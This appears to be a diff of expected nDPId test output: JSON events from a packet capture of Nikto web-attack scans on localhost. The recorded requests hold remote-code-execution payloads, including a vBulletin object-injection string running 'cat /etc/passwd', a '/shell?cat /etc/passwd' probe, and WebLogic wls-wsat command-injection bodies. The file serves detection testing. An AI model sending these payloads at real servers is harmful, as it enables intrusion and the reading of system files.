+01390{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":787,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":787,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277998,"flow_last_seen":1576420277998,"flow_idle_time":7580000,"flow_min_l4_payload_len":585,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":585,"midstream":1,"thread_ts_msec":1576420277998,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51184,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/vbulletin\/ajax\/api\/hook\/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007058)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00827{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_packet_id":1,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":326,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":326,"pkt_l4_len":292,"thread_ts_msec":1576420278000,"pkt":"AAAAAAAAAAAAAAAACABFAAE4KORAAEAGEtp\/AAABfwAAAcfyH5Cd7RG\/LUrqEYAYAED\/LAAAAQEICp1nABidZwAYR0VUIC9zaGVsbD9jYXQlMjAvZXRjL3Bhc3N3ZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MDg0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":788,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278000,"flow_last_seen":1576420278000,"flow_idle_time":7580000,"flow_min_l4_payload_len":260,"flow_max_l4_payload_len":260,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":260,"midstream":1,"thread_ts_msec":1576420278000,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51186,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/shell?cat%20\/etc\/passwd","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007084)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00834{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_packet_id":1,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278001,"pkt":"AAAAAAAAAAAAAAAACABFAAE9gkdAAEAGuXF\/AAABfwAAAcf0H5CX+bsaLFgA+4AYAED\/MQAAAQEICp1nABmdZwAZR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgyKQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":789,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":789,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278001,"flow_last_seen":1576420278001,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51188,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007182)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00838{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_packet_id":1,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":335,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":335,"pkt_l4_len":301,"thread_ts_msec":1576420278002,"pkt":"AAAAAAAAAAAAAAAACABFAAFBkptAAEAGqRl\/AAABfwAAAcf2H5CPbqvGHGavS4AYAED\/NQAAAQEICp1nABqdZwAaR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTgzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} 
+01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":790,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278002,"flow_last_seen":1576420278002,"flow_idle_time":7580000,"flow_min_l4_payload_len":269,"flow_max_l4_payload_len":269,"flow_tot_l4_payload_len":269,"flow_avg_l4_payload_len":269,"midstream":1,"thread_ts_msec":1576420278002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51190,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007183)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":331,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":331,"pkt_l4_len":297,"thread_ts_msec":1576420278004,"pkt":"AAAAAAAAAAAAAAAACABFAAE99rJAAEAGRQZ\/AAABfwAAAcf4H5DOUc\/uMPSpHIAYAED\/MQAAAQEICp1nABudZwAbR0VUIC93bHMtd3NhdC9QYXJ0aWNpcGFudFBvcnRUeXBlIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDcxODQpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":791,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278004,"flow_last_seen":1576420278004,"flow_idle_time":7580000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":1,"thread_ts_msec":1576420278004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51192,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/ParticipantPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007184)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00846{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":1576420278005,"pkt":"AAAAAAAAAAAAAAAACABFAAFH9c9AAEAGRd9\/AAABfwAAAcf6H5CvysyRaoy75oAYAED\/OwAAAQEICp1nAB2dZwAdR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25SZXF1ZXN0ZXJQb3J0VHlwZSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAzOQ0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94LXd3dy1mb3JtLXVybGVuY29kZWQNCkhvc3Q6IDEyNy4wLjAuMQ0KDQp0cmFuc2FjdGlvbl9pZD0xJm9hdXRoX3Rva2VuPSclM2JlY2hvICc="} -01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} 
+01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":792,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278005,"flow_last_seen":1576420278005,"flow_idle_time":7580000,"flow_min_l4_payload_len":275,"flow_max_l4_payload_len":275,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":275,"midstream":1,"thread_ts_msec":1576420278005,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51194,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationRequesterPortType","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007185)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00835{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":333,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":333,"pkt_l4_len":299,"thread_ts_msec":1576420278006,"pkt":"AAAAAAAAAAAAAAAACABFAAE\/YadAAEAG2g9\/AAABfwAAAcf8H5A46lj5CJ27noAYAED\/MwAAAQEICp1nAB6dZwAeR0VUIC93bHMtd3NhdC9Db29yZGluYXRvclBvcnRUeXBlMTEgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29udGVudC1MZW5ndGg6IDM5DQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwNzE4NikNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KdHJhbnNhY3Rpb25faWQ9MSZvYXV0aF90b2tlbj0nJTNiZWNobyAn"} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":793,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278006,"flow_last_seen":1576420278006,"flow_idle_time":7580000,"flow_min_l4_payload_len":267,"flow_max_l4_payload_len":267,"flow_tot_l4_payload_len":267,"flow_avg_l4_payload_len":267,"midstream":1,"thread_ts_msec":1576420278006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51196,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/CoordinatorPortType11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007186)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":1576420278008,"pkt":"AAAAAAAAAAAAAAAACABFAAFD5CdAAEAGV4t\/AAABfwAAAcf+H5BRed18Cunwm4AYAED\/NwAAAQEICp1nACCdZwAfR0VUIC93bHMtd3NhdC9SZWdpc3RyYXRpb25Qb3J0VHlwZVJQQzExIEhUVFAvMS4xDQpDb250ZW50LUxlbmd0aDogMzkNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDA3MTg3KQ0KSG9zdDogMTI3LjAuMC4xDQoNCnRyYW5zYWN0aW9uX2lkPTEmb2F1dGhfdG9rZW49JyUzYmVjaG8gJw=="} -01073{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":794,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420278008,"flow_last_seen":1576420278008,"flow_idle_time":7580000,"flow_min_l4_payload_len":271,"flow_max_l4_payload_len":271,"flow_tot_l4_payload_len":271,"flow_avg_l4_payload_len":271,"midstream":1,"thread_ts_msec":1576420278008,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51198,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/wls-wsat\/RegistrationPortTypeRPC11","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:007187)"}} 
